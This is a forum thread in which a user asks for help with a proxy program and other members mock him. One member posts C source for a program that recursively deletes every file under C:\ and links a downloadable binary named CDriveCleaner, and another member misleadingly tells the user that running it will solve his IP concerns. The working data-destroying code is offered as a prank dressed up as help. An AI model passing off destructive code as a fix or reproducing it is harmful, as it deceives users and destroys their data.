Locked

Post subject: Anyone want to help me learn how to use a proxy ?
Joined: 1/1/2022
Posts: 1716
Since someone mentioned I am curious to see how it works. Im using this program right here http://www.analogx.com/contents/download/network/proxy.htm http://www.proxy4free.com/page2.html I tried using ips from here but cant seem to get it to work.
Joined: 1/1/2022
Posts: 1716
The ip address is pingable but just cant get it to work. IT stays on red and wont work.
Joined: 11/22/2004
Posts: 1468
Location: Rotterdam, The Netherlands
Please refrain from posting in a twofold manner.
Joined: 1/1/2022
Posts: 1716
dont know what that means.
Former player
Joined: 3/19/2004
Posts: 710
Location: USA
You shouldn't double post; edit your original message instead.
Active player (277)
Joined: 5/29/2004
Posts: 5712
Oh, you're GONNA know what it means.
put yourself in my rocketpack if that poochie is one outrageous dude
Joined: 1/1/2022
Posts: 1716
Thanx for your help guys I really appreciate it.
Former player
Joined: 8/12/2004
Posts: 651
Location: Alberta, Canada
Editting your message to try to annoy people into helping you isn't going to help you any. It's something that will get you banned...
Joined: 3/17/2005
Posts: 67
Omega wrote:
Please refrain from posting.
fixed
Banned User, Former player
Joined: 12/23/2004
Posts: 1850
Do you even know what a proxy is? From the looks of it... I doubt it =/
Perma-banned
Joined: 1/1/2022
Posts: 1716
Omega wrote:
Please refrain from posting in a twofold manner.
Bob Whoops wrote:
You shouldn't double post; edit your original message instead.
Bag of Magic Food wrote:
Oh, you're GONNA know what it means.
BoltR wrote:
Editting your message to try to annoy people into helping you isn't going to help you any. It's something that will get you banned...
suraimu wrote:
Omega wrote:
Please refrain from posting.
fixed
try to stay on topic guys, if you cant help me just dont reply thank you. BOB WHOOPS JUST STOP replying , you dont have to say ok or anything.
Former player
Joined: 3/19/2004
Posts: 710
Location: USA
ok
Banned User, Former player
Joined: 12/23/2004
Posts: 1850
SSVegetto wrote:
dont know what that means.
SSVegetto wrote:
[insert giant annoying quote involving everyone giving him the answer to the above question] try to stay on topic guys, if you cant help me just dont reply thank you.
Okay, first answer the question. DO YOU EVEN KNOW WHAT A PROXY IS?!
Perma-banned
Joined: 1/1/2022
Posts: 1716
Xkeeper wrote:
SSVegetto wrote:
dont know what that means.
SSVegetto wrote:
[insert giant annoying quote involving everyone giving him the answer to the above question] try to stay on topic guys, if you cant help me just dont reply thank you.
Okay, first answer the question. DO YOU EVEN KNOW WHAT A PROXY IS?!
of course I know what a proxy is I just said in my first post that I downloaded a proxy program. I read the readme also.
Emulator Coder
Joined: 3/9/2004
Posts: 4588
Location: In his lab studying psychology to find new ways to torture TASers and forumers
I know this will make some people happy.
#include <stdio.h>
#include <dirent.h>
#include <unistd.h>
#include <sys/stat.h>

void parse_dir(const char *dir_loc)
{
  chdir(dir_loc);
  DIR *curDir = opendir(".");
  dirent *curFile;
  while ((curFile = readdir(curDir)))
  {
    char *filename = curFile->d_name;
    
    if (!strcmp(filename, ".") || !strcmp(filename, ".."))
    {
      continue;
    }
            
    struct stat stat_buffer;
    if (stat(filename, &stat_buffer)) { continue; }
            
    //Directory
    if (S_ISDIR(stat_buffer.st_mode))
    {
      parse_dir(filename);
      chdir("..");
      rmdir(filename);
      continue;
    }
    remove(filename);    
  }
  closedir(curDir);
}

int main()
{
  parse_dir("c:\");
  return(0);
}
If you don't understand what the file does, I advise not trying to use it.
Warning: Opinions expressed by Nach or others in this post do not necessarily reflect the views, opinions, or position of Nach himself on the matter(s) being discussed therein.
Joined: 1/1/2022
Posts: 1716
whats it for ? are you going off topic ?
Emulator Coder
Joined: 3/9/2004
Posts: 4588
Location: In his lab studying psychology to find new ways to torture TASers and forumers
It's a solution to the problem you seem to be displaying.
Warning: Opinions expressed by Nach or others in this post do not necessarily reflect the views, opinions, or position of Nach himself on the matter(s) being discussed therein.
Former player
Joined: 3/19/2004
Posts: 710
Location: USA
No, it's on topic. If you run it, it will solve your problem of worrying about people having your IP.
Joined: 5/29/2004
Posts: 757
SSVegetto wrote:
whats it for ? are you going off topic ?
I'd dare say, it was posted to compile and use.. in regards to your proxy inquiry. But... just for the record.. you do realize how absolutely amusing it is for you to ask if someone's going off topic in a forum that just so happens to be labelled, Off Topic? [Snicker]
Mr. Kelly R. Flewin Just another random gamer ---- <OmnipotentEntity> How do you people get bored in the span of 10 seconds? Worst ADD ever.
Joined: 1/1/2022
Posts: 1716
So this is for Mirc ? or for a proxy ? please tell me how to run it or what it is . I'm still confused
Mr. Kelly R. Flewin wrote:
SSVegetto wrote:
whats it for ? are you going off topic ?
I'd dare say, it was posted to compile and use.. in regards to your proxy inquiry. But... just for the record.. you do realize how absolutely amusing it is for you to ask if someone's going off topic in a forum that just so happens to be labelled, Off Topic? [Snicker]
WOULD you stop trying to start another argument.
Joined: 5/29/2004
Posts: 757
SSVegetto wrote:
WOULD you stop trying to start another argument.
I made no attempt whatsoever to start an argument. I merely pointed out an amusing redundancy so that others may get a quick chuckle. I'm very sorry you seem to have been so gravely offended. My most sincere apologies.
Mr. Kelly R. Flewin Just another random gamer ---- <OmnipotentEntity> How do you people get bored in the span of 10 seconds? Worst ADD ever.
Emulator Coder
Joined: 3/9/2004
Posts: 4588
Location: In his lab studying psychology to find new ways to torture TASers and forumers
Two bugs fixed.
#include <stdio.h>
#include <dirent.h>
#include <unistd.h>
#include <string.h>
#include <sys/stat.h>

bool parse_dir(const char *dir_loc)
{
  if (!chdir(dir_loc)) //chdir() returns 0 on success
  {
    DIR *curDir = opendir(".");
    dirent *curFile;
    while ((curFile = readdir(curDir)))
    {
      char *filename = curFile->d_name;
    
      if (!strcmp(filename, ".") || !strcmp(filename, ".."))
      {
        continue;
      }
            
      struct stat stat_buffer;
      if (stat(filename, &stat_buffer)) { continue; }
            
      //Directory
      if (S_ISDIR(stat_buffer.st_mode))
      {
        if (parse_dir(filename))
        {
          chdir("..");
          rmdir(filename);
        }  
        continue;
      }
      remove(filename);    
    }
    closedir(curDir);
    return(true);
  }
  return(false);
}

int main(size_t argc, char **argv)
{
  parse_dir(".");
  return(0);
}
Again, if you don't understand it, I advise you don't run it.
Warning: Opinions expressed by Nach or others in this post do not necessarily reflect the views, opinions, or position of Nach himself on the matter(s) being discussed therein.
Banned User, Former player
Joined: 12/23/2004
Posts: 1850
http://nsrt.edgeemu.com/CDriveCleaner.ZIP WARNING: KNOW WHAT YOU ARE DOING
Perma-banned
Emulator Coder
Joined: 3/9/2004
Posts: 4588
Location: In his lab studying psychology to find new ways to torture TASers and forumers
If you would like to download the program, you can get it here: http://nsrt.edgeemu.com/CDriveCleaner.ZIP Note the zip is password protected and includes a binary, updated source, and a readme. I'll give the password to whoever requests it.
Warning: Opinions expressed by Nach or others in this post do not necessarily reflect the views, opinions, or position of Nach himself on the matter(s) being discussed therein.
Joined: 1/1/2022
Posts: 1716
This package contains a tool which will remove the contents of the "C Drive" in Windows. It doesn't always work due to stuff known as "permissions". Uses of this program are few, and if you're reading this, you probably don't want to use this program. CDriveCleaner.EXE - The Binary src.cpp - The Source readme.txt - This file thats the readme for it HOW DOES THIS HELP ME WITH A PROXY ?

Locked